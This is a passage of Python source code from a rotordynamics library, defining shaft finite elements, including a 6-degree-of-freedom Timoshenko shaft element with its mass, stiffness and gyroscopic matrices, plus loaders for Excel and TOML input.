                    + f"Right Outer Diameter: {round(customdata[3], 6)} {units}<br>"
                    + f"Right Inner Diameter: {round(customdata[4], 6)} {units}<br>"
                    + f"Element Length: {round(customdata[5], 6)} {units}<br>"
                    + f"Material: {customdata[6]}<br>"
                )
        fig.add_trace(
            go.Scatter(
                x=Q_(z_pos, "m").to(units).m,
                y=Q_(y_pos, "m").to(units).m,
                customdata=[customdata] * len(z_pos),
                text=hovertemplate,
                mode="lines",
                opacity=0.5,
                fill="toself",
                fillcolor=color,
                line=dict(width=1.5, color="black"),
                showlegend=False,
                name=self.tag,
                legendgroup=legend,
                hoveron="points+fills",
                hoverinfo="text",
                hovertemplate=hovertemplate,
                hoverlabel=dict(bgcolor=color),
            )
        )
        return fig
@classmethod
def from_table(cls, file, sheet_type="Simple", sheet_name=0):
"""Instantiate one or more shafts using inputs from an Excel table.
A header with the names of the columns is required. These names should
match the names expected by the routine (usually the names of the
parameters, but also similar ones). The program will read every row
bellow the header until they end or it reaches a NaN.
Parameters
----------
file : str
Path to the file containing the shaft parameters.
sheet_type : str, optional
Describes the kind of sheet the function should expect:
Simple: The input table should specify only the number of the materials
to be used.
They must be saved prior to calling the method.
Model: The materials parameters must be passed along with the shaft
parameters. Each material must have an id number and each shaft must
reference one of the materials ids.
sheet_name : int or str, optional
Position of the sheet in the file (starting from 0) or its name. If none is
passed, it is assumed to be the first sheet in the file.
Returns
-------
shaft : list
A list of shaft objects.
"""
parameters = read_table_file(
file, "shaft", sheet_name=sheet_name, sheet_type=sheet_type
)
list_of_shafts = []
if sheet_type == "Model":
new_materials = {}
for i in range(0, len(parameters["matno"])):
new_material = Material(
name="shaft_mat_" + str(parameters["matno"][i]),
rho=parameters["rhoa"][i],
E=parameters["ea"][i],
G_s=parameters["ga"][i],
color=parameters["color"][i],
)
new_materials["shaft_mat_" + str(parameters["matno"][i])] = new_material
for i in range(0, len(parameters["L"])):
list_of_shafts.append(
cls(
L=parameters["L"][i],
idl=parameters["idl"][i],
odl=parameters["odl"][i],
idr=parameters["idr"][i],
odr=parameters["odr"][i],
material=new_materials[parameters["material"][i]],
n=parameters["n"][i],
axial_force=parameters["axial_force"][i],
torque=parameters["torque"][i],
shear_effects=parameters["shear_effects"][i],
rotary_inertia=parameters["rotary_inertia"][i],
gyroscopic=parameters["gyroscopic"][i],
shear_method_calc=parameters["shear_method_calc"][i],
)
)
elif sheet_type == "Simple":
for i in range(0, len(parameters["L"])):
list_of_shafts.append(
cls(
L=parameters["L"][i],
idl=parameters["idl"][i],
odl=parameters["odl"][i],
idr=parameters["idr"][i],
odr=parameters["odr"][i],
material=parameters["material"][i],
n=parameters["n"][i],
axial_force=parameters["axial_force"][i],
torque=parameters["torque"][i],
shear_effects=parameters["shear_effects"][i],
rotary_inertia=parameters["rotary_inertia"][i],
gyroscopic=parameters["gyroscopic"][i],
shear_method_calc=parameters["shear_method_calc"][i],
)
)
return list_of_shafts
@classmethod
def section(
cls,
L,
ne,
s_idl,
s_odl,
s_idr=None,
s_odr=None,
material=None,
n=None,
shear_effects=True,
rotary_inertia=True,
gyroscopic=True,
):
"""Shaft section constructor.
This method will create a shaft section with length 'L' divided into
'ne' elements.
Parameters
----------
i_d : float
Inner diameter of the section.
o_d : float
Outer diameter of the section.
E : float
Young's modulus.
G_s : float
Shear modulus.
material : ross.material
Shaft material.
n : int, optional
Element number (coincident with it's first node).
If not given, it will be set when the rotor is assembled
according to the element's position in the list supplied to
the rotor constructor.
axial_force : float
Axial force.
torque : float
Torque.
shear_effects : bool
Determine if shear effects are taken into account.
Default is False.
rotary_inertia : bool
Determine if rotary_inertia effects are taken into account.
Default is False.
gyroscopic : bool
Determine if gyroscopic effects are taken into account.
Default is False.
Returns
-------
elements : list
List with the 'ne' shaft elements.
Examples
--------
>>> # shaft material
>>> from ross.materials import steel
>>> # shaft inner and outer diameters
>>> s_idl = 0
>>> s_odl = 0.01585
>>> sec = ShaftElement.section(247.65e-3, 4, 0, 15.8e-3, material=steel)
>>> len(sec)
4
>>> sec[0].i_d
0.0
"""
if s_idr is None:
s_idr = s_idl
if s_odr is None:
s_odr = s_odl
le = L / ne
elements = [
cls(
le,
(s_idr - s_idl) * i * le / L + s_idl,
(s_odr - s_odl) * i * le / L + s_odl,
(s_idr - s_idl) * (i + 1) * le / L + s_idl,
(s_odr - s_odl) * (i + 1) * le / L + s_odl,
material,
n,
shear_effects,
rotary_inertia,
gyroscopic,
)
for i in range(ne)
]
return elements
class ShaftElement6DoF(ShaftElement):
r"""A 6 Degrees of Freedom shaft element.
This class will create a shaft element that takes into
account shear stress, rotary inertia and gyroscopic effects.
The matrices will be defined considering the following local
coordinate vector:
.. math::
[u_0, v_0, w_0, \theta_0, \psi_0, \phi_0, u_1, v_1, w_1, \theta_1, \psi_1, \phi_1]^T
Being the following their ordering for an element:
:math:`x_0,u_0` - horizontal translation;
:math:`y_0,v_0` - vertical translation;
:math:`z_0,w_0` - axial translation;
:math:`\theta_0` - rotation around horizontal, bending on the yz plane;
:math:`\psi_0` - rotation around vertical, bending on the xz plane;
:math:`\phi_0` - torsion around axial, z direction.
Parameters
----------
L : float, pint.Quantity
Element length.
idl : float, pint.Quantity
Inner diameter of the element at the left node (m).
odl : float, pint.Quantity
Outer diameter of the element at the left node (m).
idr : float, pint.Quantity, optional
Inner diameter of the element at the right node (m).
Default is equal to idl value for cylindrical element.
odr : float, pint.Quantity, optional
Outer diameter of the element at the right node (m).
Default is equal to odl value for cylindrical element.
material : ross.Material
Shaft material.
alpha : float, optional
Proportional damping coefficient, associated to the element Mass matrix
beta : float, optional
Proportional damping coefficient, associated to the element Stiffness matrix
n : int, optional
Element number, coincident with its first node.
If not given, it will be set when the rotor is assembled
according to the element's position in the list supplied to
the rotor constructor.
axial_force : float, optional
Axial force (N).
Default is zero.
torque : float, optional
Torque moment (N*m).
Default is zero.
shear_effects : bool, optional
Determine if shear effects are taken into account;
Default is True.
rotary_inertia : bool, optional
Determine if rotary_inertia effects are taken into account;
Default is True.
gyroscopic : bool, optional
Determine if gyroscopic effects are taken into account;
Default is True.
tag : str, optional
Element tag;
Default is None.
Returns
-------
shaft_element : rs.ShaftElement6DoF
A 6 degrees of freedom shaft element, with available gyroscopic, shear and rotary inertia effects.
Attributes
----------
Poisson : float
Poisson coefficient for the element.
kappa : float
Shear coefficient for the element, determined from :cite:`Hutchingson2001`
formulation.
References
----------
.. bibliography::
:filter: docname in docnames
Examples
--------
>>> from ross.materials import steel
>>> shaft1 = ShaftElement6DoF(L=0.5, idl=0.0, odl=0.01, idr=0.0, odr=0.01,
... material=steel, n=0, axial_force=10, torque=30)
>>> shaft2 = ShaftElement6DoF(L=0.5, idl=0.05, odl=0.1, idr=0.05, odr=0.15,
... alpha=0.01, beta=100, material=steel,
... rotary_inertia=False, shear_effects=False)
>>> shaft2.kappa
0.7099387976608923
"""
@check_units
def __init__(
    self,
    L,
    idl,
    odl,
    idr=None,
    odr=None,
    material=None,
    n=None,
    axial_force=0,
    torque=0,
    shear_effects=True,
    rotary_inertia=True,
    gyroscopic=True,
    alpha=0,
    beta=0,
    tag=None,
):
    """Create a 6 DoF shaft element (see class docstring for parameters)."""
    # Default to a cylindrical element: the right-node diameters fall
    # back to the left-node values when not supplied.
    if idr is None:
        idr = idl
    if odr is None:
        odr = odl
    if material is None:
        raise AttributeError("Material is not defined.")
    # A material may be given as an instance or as the name of a
    # previously saved material.
    if type(material) is str:
        self.material = Material.load_material(material)
    else:
        self.material = material
    self.shear_effects = shear_effects
    self.rotary_inertia = rotary_inertia
    self.gyroscopic = gyroscopic
    self.axial_force = axial_force
    self.torque = torque
    # n_l / n_r are the left and right node numbers; n_r stays None
    # until the element number is known (set here or on rotor assembly).
    self._n = n
    self.n_l = n
    self.n_r = None
    if n is not None:
        self.n_r = n + 1
    self.tag = tag
    self.L = float(L)
    # Mean diameters, used where a single representative value suffices.
    self.o_d = (float(odl) + float(odr)) / 2
    self.i_d = (float(idl) + float(idr)) / 2
    self.idl = float(idl)
    self.odl = float(odl)
    self.idr = float(idr)
    self.odr = float(odr)
    self.color = self.material.color
    # A_l = cross section area from the left side of the element
    # A_r = cross section area from the right side of the element
    A_l = np.pi * (odl ** 2 - idl ** 2) / 4
    A_r = np.pi * (odr ** 2 - idr ** 2) / 4
    self.A_l = A_l
    self.A_r = A_r
    # Second moment of area of the cross section from the left side
    # of the element
    Ie_l = np.pi * (odl ** 4 - idl ** 4) / 64
    # Volume of the (possibly tapered) hollow frustum; mass follows
    # from the material density.
    outer = self.odl ** 2 + self.odl * self.odr + self.odr ** 2
    inner = self.idl ** 2 + self.idl * self.idr + self.idr ** 2
    self.volume = np.pi * (self.L / 12) * (outer - inner)
    self.m = self.material.rho * self.volume
    # Radii at the left ("j") and right ("k") cross sections.
    roj = odl / 2
    rij = idl / 2
    rok = odr / 2
    rik = idr / 2
    # geometrical coefficients describing how area and second moment of
    # area vary along the taper (all zero for a cylindrical element,
    # since then delta_ro == delta_ri == 0)
    delta_ro = rok - roj
    delta_ri = rik - rij
    a1 = 2 * np.pi * (roj * delta_ro - rij * delta_ri) / A_l
    a2 = np.pi * (roj ** 3 * delta_ro - rij ** 3 * delta_ri) / Ie_l
    b1 = np.pi * (delta_ro ** 2 - delta_ri ** 2) / A_l
    b2 = (
        3
        * np.pi
        * (roj ** 2 * delta_ro ** 2 - rij ** 2 * delta_ri ** 2)
        / (2 * Ie_l)
    )
    gama = np.pi * (roj * delta_ro ** 3 - rij * delta_ri ** 3) / Ie_l
    delta = np.pi * (delta_ro ** 4 - delta_ri ** 4) / (4 * Ie_l)
    self.a1 = a1
    self.a2 = a2
    self.b1 = b1
    self.b2 = b2
    self.gama = gama
    self.delta = delta
    # the area is calculated from the cross section located in the middle
    # of the element
    self.A = A_l * (1 + a1 * 0.5 + b1 * 0.5 ** 2)
    # Ie is the second moment of area of the cross section - located in
    # the middle of the element - about the neutral plane
    Ie = Ie_l * (1 + a2 * 0.5 + b2 * 0.5 ** 2 + gama * 0.5 ** 3 + delta * 0.5 ** 4)
    self.Ie = Ie
    self.Ie_l = Ie_l
    # geometric center (axial position of the element's center of mass,
    # measured from the left node)
    c1 = (
        roj ** 2
        + 2 * roj * rok
        + 3 * rok ** 2
        - rij ** 2
        - 2 * rij * rik
        - 3 * rik ** 2
    )
    c2 = (roj ** 2 + roj * rok + rok ** 2) - (rij ** 2 + rij * rik + rik ** 2)
    self.beam_cg = L * c1 / (4 * c2)
    self.axial_cg_pos = None
    # Slenderness ratio of beam elements (G*A*L**2) / (E*I)
    sld = (self.material.G_s * self.A * self.L ** 2) / (self.material.E * Ie)
    self.slenderness_ratio = sld
    # Moment of inertia
    # fmt: off
    self.Im = (
        (np.pi * L * (self.m / self.volume) / 10) *
        ((roj ** 4 + roj ** 3 * rok + roj ** 2 * rok ** 2 + roj * rok ** 3 + rok ** 4) -
         (rij ** 4 + rij ** 3 * rik + rij ** 2 * rik ** 2 + rij * rik ** 3 + rik ** 4))
    )
    # fmt: on
    self.alpha = float(alpha)
    self.beta = float(beta)
    # Timoshenko kappa factor determination, based on the diameters relation
    # (solid circular, thick-walled tube, or thin-walled tube formulas)
    if self.__is_circular():
        kappa = (6 * (1 + self.material.Poisson) ** 2) / (
            7 + 12 * self.material.Poisson + 4 * self.material.Poisson ** 2
        )
    elif self.__is_thickwall():
        # a/b: mean inner and outer diameters of the element
        a = (self.idl + self.idr) / 2
        b = (self.odl + self.odr) / 2
        v = self.material.Poisson
        kappa = (6 * (a ** 2 + b ** 2) ** 2 * (1 + v) ** 2) / (
            7 * a ** 4
            + 34 * a ** 2 * b ** 2
            + 7 * b ** 4
            + v * (12 * a ** 4 + 48 * a ** 2 * b ** 2 + 12 * b ** 4)
            + v ** 2 * (4 * a ** 4 + 16 * a ** 2 * b ** 2 + 4 * b ** 4)
        )
    else:
        kappa = (1 + self.material.Poisson) / (2 + self.material.Poisson)
    self.kappa = kappa
    # Filled in later, when the element is placed inside a rotor model.
    self.dof_global_index = None
def __is_circular(self):
    """Return True when the element is solid, i.e. both nodes have no bore."""
    return not (self.idl or self.idr)
def __is_thickwall(self):
    """Return True when the mean wall thickness is at least 20% of the
    mean outer diameter (thick-walled tube criterion for kappa)."""
    mean_outer = (self.odl + self.odr) / 2
    mean_inner = (self.idl + self.idr) / 2
    thickness_ratio = (mean_outer - mean_inner) / mean_outer
    return thickness_ratio >= 0.2
def __repr__(self):
    """Return a string representation of a shaft element.
    Returns
    -------
    A string representation of a 6 DoF shaft object.
    Examples
    --------
    >>> from ross.materials import steel
    >>> shaft1 = ShaftElement6DoF(
    ...     L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
    ...     material=steel, rotary_inertia=True, shear_effects=True
    ... )
    >>> shaft1 # doctest: +ELLIPSIS
    ShaftElement6DoF(L=0.25, idl=0.0...
    """
    # The nested {0}.{5} replacement fields build the format spec "0.5",
    # i.e. floats are shown with 5 significant digits.
    return (
        f"{self.__class__.__name__}"
        f"(L={self.L:{0}.{5}}, idl={self.idl:{0}.{5}}, "
        f"idr={self.idr:{0}.{5}}, odl={self.odl:{0}.{5}}, "
        f"odr={self.odr:{0}.{5}}, material={self.material.name!r}, "
        f"alpha={self.alpha:{0}.{5}}, beta={self.beta:{0}.{5}}, "
        f"n={self.n})"
    )
def __str__(self):
    """Convert object into string.
    Returns
    -------
    The object's parameters translated to strings
    Example
    -------
    >>> print(ShaftElement6DoF(L=0.25, idl=0, odl=0.05, odr=0.08, material=steel))
    Element Number: None
    Element Lenght (m): 0.25
    Left Int. Diam. (m): 0.0
    Left Out. Diam. (m): 0.05
    Right Int. Diam. (m): 0.0
    Right Out. Diam. (m): 0.08
    Alpha damp. factor: 0.0
    Beta damp. factor: 0.0
    -----------------------------------
    Steel
    -----------------------------------
    Density (kg/m**3): 7810.0
    Young`s modulus (N/m**2): 2.11e+11
    Shear modulus (N/m**2): 8.12e+10
    Poisson coefficient : 0.29926108
    """
    # NOTE(review): the "Lenght" misspelling is part of the runtime output
    # and of the doctest above; fixing it would change behavior, so it is
    # left untouched. The {10}.{5} fields build the format spec "10.5"
    # (width 10, precision 5).
    return (
        f"Element Number: {self.n}"
        f"\nElement Lenght (m): {self.L:{10}.{5}}"
        f"\nLeft Int. Diam. (m): {self.idl:{10}.{5}}"
        f"\nLeft Out. Diam. (m): {self.odl:{10}.{5}}"
        f"\nRight Int. Diam. (m): {self.idr:{10}.{5}}"
        f"\nRight Out. Diam. (m): {self.odr:{10}.{5}}"
        f"\nAlpha damp. factor: {self.alpha:{10}.{5}}"
        f"\nBeta damp. factor: {self.beta:{10}.{5}}"
        f'\n{35*"-"}'
        f"\n{self.material}"
    )
def save(self, file):
    """Append this element's constructor arguments to a toml file.

    The entry is stored under the key ``<ClassName>_<tag>``. The full
    material definition is embedded so the element can be reconstructed
    even if the material is not in the available_materials file.
    """
    # Collect one value per constructor parameter, in signature order.
    params = {
        name: getattr(self, name)
        for name in inspect.signature(self.__init__).parameters
    }
    mat = self.material
    params["material"] = {
        "name": mat.name,
        "rho": mat.rho,
        "E": mat.E,
        "G_s": mat.G_s,
        "color": mat.color,
    }
    # Merge into any existing file content; start fresh when absent.
    try:
        existing = toml.load(file)
    except FileNotFoundError:
        existing = {}
    existing[f"{self.__class__.__name__}_{self.tag}"] = params
    with open(file, "w") as f:
        toml.dump(existing, f)
@classmethod
def read_toml_data(cls, data):
    """Instantiate an element from a dict previously produced by ``save``.

    The serialized material mapping is inflated back into a ``Material``
    instance before the remaining entries are forwarded to the constructor.
    """
    data["material"] = Material(**data.pop("material"))
    return cls(**data)
def dof_mapping(self):
    """Degrees of freedom mapping.

    Returns a dictionary with a mapping between degree of freedom and its index.

    Returns
    -------
    dof_mapping : dict
        A dictionary containing the degrees of freedom and their indexes.

    Examples
    --------
    The numbering of the degrees of freedom for each node.
    Being the following their ordering for a node:
    x_0 - horizontal translation
    y_0 - vertical translation
    z_0 - axial translation
    alpha_0 - rotation around horizontal
    beta_0 - rotation around vertical
    theta_0 - torsion around axial

    >>> sh = ShaftElement6DoF(L=0.5, idl=0.05, odl=0.1, material=steel,
    ...                       rotary_inertia=True, shear_effects=True)
    >>> sh.dof_mapping()["x_0"]
    0
    """
    # Six DoFs per node, node 0 first then node 1, in a fixed order.
    labels = (
        "x_0", "y_0", "z_0", "alpha_0", "beta_0", "theta_0",
        "x_1", "y_1", "z_1", "alpha_1", "beta_1", "theta_1",
    )
    return {label: index for index, label in enumerate(labels)}
def M(self):
    """Mass matrix for an instance of a 6 DoF shaft element.
    Returns
    -------
    M : np.ndarray
        Mass matrix for the 6 DoF shaft element.
    Examples
    --------
    >>> Timoshenko_Element = ShaftElement6DoF(0.25, 0, 0.05, material=steel)
    >>> Timoshenko_Element.M().shape
    (12, 12)
    """
    # temporary material and geometrical constants
    # tempS: cross-section area and tempI: second moment of area, both
    # built from the mean of the left/right radii powers (tapered shaft
    # approximated by its average cross section).
    L = self.L
    tempS = np.pi * (
        ((self.odr / 2) ** 2 + (self.odl / 2) ** 2) / 2
        - ((self.idr / 2) ** 2 + (self.idl / 2) ** 2) / 2
    )
    tempI = (
        np.pi
        / 4
        * (
            ((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
            - ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
        )
    )
    # element level matrix declaration
    aux1 = self.material.rho * tempS * L / 420
    # fmt: off
    # Standard mass matrix (lateral DoFs only; the all-zero rows/columns
    # are the axial and torsional DoFs, filled in by Ma and Mr below)
    M = aux1 * np.array([
        [ 156,     0, 0,      0,  -22*L, 0,    54,     0, 0,      0,  13*L, 0],
        [   0,   156, 0,   22*L,      0, 0,     0,    54, 0,  -13*L,     0, 0],
        [   0,     0, 0,      0,      0, 0,     0,     0, 0,      0,     0, 0],
        [   0,  22*L, 0, 4*L**2,      0, 0,     0,  13*L, 0,-3*L**2,     0, 0],
        [-22*L,    0, 0,      0, 4*L**2, 0, -13*L,     0, 0,      0,-3*L**2, 0],
        [   0,     0, 0,      0,      0, 0,     0,     0, 0,      0,     0, 0],
        [  54,     0, 0,      0,  -13*L, 0,   156,     0, 0,      0,  22*L, 0],
        [   0,    54, 0,   13*L,      0, 0,     0,   156, 0,  -22*L,     0, 0],
        [   0,     0, 0,      0,      0, 0,     0,     0, 0,      0,     0, 0],
        [   0, -13*L, 0,-3*L**2,      0, 0,     0, -22*L, 0, 4*L**2,     0, 0],
        [ 13*L,    0, 0,      0,-3*L**2, 0,  22*L,     0, 0,      0, 4*L**2, 0],
        [   0,     0, 0,      0,      0, 0,     0,     0, 0,      0,     0, 0],
    ])
    # Secondary inertias mass matrix
    Ms = self.material.rho * tempI / (30 * L) * np.array([
        [  36,    0, 0,     0,  -3*L, 0,  -36,    0, 0,     0,  -3*L, 0],
        [   0,   36, 0,   3*L,     0, 0,    0,  -36, 0,   3*L,     0, 0],
        [   0,    0, 0,     0,     0, 0,    0,    0, 0,     0,     0, 0],
        [   0,  3*L, 0,4*L**2,     0, 0,    0, -3*L, 0, -L**2,     0, 0],
        [-3*L,    0, 0,     0,4*L**2, 0,  3*L,    0, 0,     0, -L**2, 0],
        [   0,    0, 0,     0,     0, 0,    0,    0, 0,     0,     0, 0],
        [ -36,    0, 0,     0,   3*L, 0,   36,    0, 0,     0,   3*L, 0],
        [   0,  -36, 0,  -3*L,     0, 0,    0,   36, 0,  -3*L,     0, 0],
        [   0,    0, 0,     0,     0, 0,    0,    0, 0,     0,     0, 0],
        [   0,  3*L, 0, -L**2,     0, 0,    0, -3*L, 0,4*L**2,     0, 0],
        [-3*L,    0, 0,     0, -L**2, 0,  3*L,    0, 0,     0,4*L**2, 0],
        [   0,    0, 0,     0,     0, 0,    0,    0, 0,     0,     0, 0],
    ])
    # Axial terms inertia matrix (z translation DoFs, indexes 2 and 8)
    Ma = self.material.rho * tempS * L / 6 * np.array([
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 1, 0, 0, 0, 0, 0, 2, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
    ])
    # Torsional terms inertias matrix (phi DoFs, indexes 5 and 11)
    Mr = self.material.rho * tempI * L / 6 * np.array([
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 2],
    ])
    # fmt: on
    # Full element mass matrix: lateral + secondary + axial + torsional.
    M = M + Ms + Ma + Mr
    return M
def K(self):
    """Stiffness matrix for an instance of a 6 DoF shaft element.
    Returns
    -------
    K : np.ndarray
        Omega independent stiffness matrix for the 6 DoF shaft element.
    Examples
    --------
    >>> from ross.materials import steel
    >>> Timoshenko_Element = ShaftElement6DoF(0.25, 0, 0.05, material=steel)
    >>> Timoshenko_Element.K().shape
    (12, 12)
    """
    # Axial force and torque applied to the element.
    Fa = self.axial_force
    T = self.torque
    # temporary material and geometrical constants, determined as mean values
    # from the left and right radii of the tapered shaft
    L = self.L
    tempS = np.pi * (
        ((self.odr / 2) ** 2 + (self.odl / 2) ** 2) / 2
        - ((self.idr / 2) ** 2 + (self.idl / 2) ** 2) / 2
    )
    tempI = (
        np.pi
        / 4
        * (
            ((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
            - ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
        )
    )
    # tempJ: polar second moment of area (twice tempI for this geometry),
    # used by the torsional stiffness terms
    tempJ = (
        np.pi
        / 2
        * (
            ((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
            - ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
        )
    )
    # temporary variables
    # A: shear deformation parameter (dimensionless Timoshenko factor)
    A = (
        12
        * self.material.E
        * tempI
        / (self.material.G_s * self.kappa * tempS * L ** 2)
    )
    # auxiliary variables: bending (a1), torsional (a2) and axial (a3)
    # stiffness scale factors
    a1 = self.material.E * tempI / ((1 + A) * L ** 3)
    a2 = self.material.G_s * tempJ / L
    a3 = self.material.E * tempS / L
    # fmt: off
    # pure stiffness matrix [Kc], added to the axial loads stiffness matrix [Ka],
    # torsional stiffnesses matrix [Kr] and Timoshenko shear compensation [Ks].
    Kc_plus = a1 * np.array([
        [  12,     0,      0,            0,         -6*L,      0,  -12,     0,      0,            0,         -6*L,      0],
        [   0,    12,      0,          6*L,            0,      0,    0,   -12,      0,          6*L,            0,      0],
        [   0,     0,  a3/a1,            0,            0,      0,    0,     0, -a3/a1,            0,            0,      0],
        [   0,   6*L,      0, L**2*(A + 4),            0,      0,    0,  -6*L,      0,-L**2*(A - 2),            0,      0],
        [-6*L,     0,      0,            0, L**2*(A + 4),      0,  6*L,     0,      0,            0,-L**2*(A - 2),      0],
        [   0,     0,      0,            0,            0,  a2/a1,    0,     0,      0,            0,            0, -a2/a1],
        [ -12,     0,      0,            0,          6*L,      0,   12,     0,      0,            0,          6*L,      0],
        [   0,   -12,      0,         -6*L,            0,      0,    0,    12,      0,         -6*L,            0,      0],
        [   0,     0, -a3/a1,            0,            0,      0,    0,     0,  a3/a1,            0,            0,      0],
        [   0,   6*L,      0,-L**2*(A - 2),            0,      0,    0,  -6*L,      0, L**2*(A + 4),            0,      0],
        [-6*L,     0,      0,            0,-L**2*(A - 2),      0,  6*L,     0,      0,            0, L**2*(A + 4),      0],
        [   0,     0,      0,            0,            0, -a2/a1,    0,     0,      0,            0,            0,  a2/a1],
    ])
    # stiffness matrix due to axial loading influence
    Kf = Fa / (30 * L) * np.array([
        [  36,    0, 0,     0,  -3*L, 0,  -36,    0, 0,     0,  -3*L, 0],
        [   0,   36, 0,   3*L,     0, 0,    0,  -36, 0,   3*L,     0, 0],
        [   0,    0, 0,     0,     0, 0,    0,    0, 0,     0,     0, 0],
        [   0,  3*L, 0,4*L**2,     0, 0,    0, -3*L, 0, -L**2,     0, 0],
        [-3*L,    0, 0,     0,4*L**2, 0,  3*L,    0, 0,     0, -L**2, 0],
        [   0,    0, 0,     0,     0, 0,    0,    0, 0,     0,     0, 0],
        [ -36,    0, 0,     0,   3*L, 0,   36,    0, 0,     0,   3*L, 0],
        [   0,  -36, 0,  -3*L,     0, 0,    0,   36, 0,  -3*L,     0, 0],
        [   0,    0, 0,     0,     0, 0,    0,    0, 0,     0,     0, 0],
        [   0,  3*L, 0, -L**2,     0, 0,    0, -3*L, 0,4*L**2,     0, 0],
        [-3*L,    0, 0,     0, -L**2, 0,  3*L,    0, 0,     0,4*L**2, 0],
        [   0,    0, 0,     0,     0, 0,    0,    0, 0,     0,     0, 0],
    ])
    # stiffness matrix due to torque loading influence
    Kt = T * np.array([
        [   0,    0, 0, -1/L,    0, 0,    0,    0, 0,  1/L,    0, 0],
        [   0,    0, 0,    0, -1/L, 0,    0,    0, 0,    0,  1/L, 0],
        [   0,    0, 0,    0,    0, 0,    0,    0, 0,    0,    0, 0],
        [-1/L,    0, 0,    0,  1/2, 0,  1/L,    0, 0,    0,  1/2, 0],
        [   0, -1/L, 0, -1/2,    0, 0,    0,  1/L, 0, -1/2,    0, 0],
        [   0,    0, 0,    0,    0, 0,    0,    0, 0,    0,    0, 0],
        [   0,    0, 0,  1/L,    0, 0,    0,    0, 0, -1/L,    0, 0],
        [   0,    0, 0,    0,  1/L, 0,    0,    0, 0,    0, -1/L, 0],
        [   0,    0, 0,    0,    0, 0,    0,    0, 0,    0,    0, 0],
        [ 1/L,    0, 0,    0, -1/2, 0, -1/L,    0, 0,    0, -1/2, 0],
        [   0,  1/L, 0,  1/2,    0, 0,    0, -1/L, 0,  1/2,    0, 0],
        [   0,    0, 0,    0,    0, 0,    0,    0, 0,    0,    0, 0],
    ])
    # fmt: on
    # Dynamic stiffness matrix is added independently in "def Kst"
    # Kst = self.material.rho*tempI/(15*L)*np.array(12,12)
    K = Kc_plus + Kf + Kt
    return K
def Kst(self):
    """Dynamic stiffness matrix for an instance of a 6 DoF shaft element.
    Dynamic stiffness matrix for the 6 DoF shaft element. This is
    directly dependent on the rotation speed Omega. It needs to be
    multiplied by the adequate Omega value when used in time depen-
    dent analyses. The matrix multiplier term is:
    [(Iz*Omega*rho)/(15*L)] * [Kst]
    and here the Omega value has been suppressed and must be added
    in the adequate analyses.
    Returns
    -------
    Kst : np.ndarray
        Dynamic stiffness matrix for the 6 DoF shaft element.
    Examples
    --------
    >>> from ross.materials import steel
    >>> Timoshenko_Element = ShaftElement6DoF(0.25, 0, 0.05, material=steel)
    >>> Timoshenko_Element.Kst().shape
    (12, 12)
    """
    # temporary material and geometrical constants, determined as mean values
    # from the left and right radii of the tapered shaft
    L = self.L
    tempI = (
        np.pi
        / 4
        * (
            ((self.odr / 2) ** 4 + (self.odl / 2) ** 4) / 2
            - ((self.idr / 2) ** 4 + (self.idl / 2) ** 4) / 2
        )
    )
    # fmt: off
    # dynamic stiffening matrix (Omega multiplier deliberately omitted,
    # see docstring)
    Kst = self.material.rho * tempI / (15 * L) * np.array([
        [0, -36, 0,   -3*L, 0, 0, 0,  36, 0,   -3*L, 0, 0],
        [0,   0, 0,      0, 0, 0, 0,   0, 0,      0, 0, 0],
        [0,   0, 0,      0, 0, 0, 0,   0, 0,      0, 0, 0],
        [0,   0, 0,      0, 0, 0, 0,   0, 0,      0, 0, 0],
        [0, 3*L, 0, 4*L**2, 0, 0, 0,-3*L, 0,  -L**2, 0, 0],
        [0,   0, 0,      0, 0, 0, 0,   0, 0,      0, 0, 0],
        [0,  36, 0,    3*L, 0, 0, 0, -36, 0,    3*L, 0, 0],
        [0,   0, 0,      0, 0, 0, 0,   0, 0,      0, 0, 0],
        [0,   0, 0,      0, 0, 0, 0,   0, 0,      0, 0, 0],
        [0,   0, 0,      0, 0, 0, 0,   0, 0,      0, 0, 0],
        [0, 3*L, 0,  -L**2, 0, 0, 0,-3*L, 0, 4*L**2, 0, 0],
        [0,   0, 0,      0, 0, 0, 0,   0, 0,      0, 0, 0],
    ])
    # fmt: on
    return Kst
def C(self):
    """Proportional (Rayleigh) damping matrix for a 6 DoF shaft element.

    The damping is a linear combination of the element mass and
    stiffness matrices: ``C = alpha * M + beta * K``.

    Returns
    -------
    C : np.ndarray
        Proportional damping matrix for the 6 DoF shaft element.

    Examples
    --------
    >>> from ross.materials import steel
